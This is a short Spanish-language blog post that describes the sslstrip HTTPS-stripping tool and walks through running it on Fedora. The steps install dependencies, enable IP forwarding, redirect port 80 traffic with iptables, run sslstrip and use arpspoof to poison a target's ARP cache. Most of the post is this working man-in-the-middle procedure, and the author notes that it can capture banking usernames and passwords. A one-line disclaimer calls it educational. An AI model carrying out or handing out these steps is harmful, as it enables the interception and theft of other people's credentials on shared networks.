This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.
Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:
Python >= 2.4
yum -y install python
Python "twisted-web"
yum -y install python-twisted-web
Arpspoof
yum -y install dsniff
Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install
Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]
Ejecutamos sslstrip.
sslstrip.py -l [listenPort]
Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]
Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.
Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.
[Sitio de SSLStrip]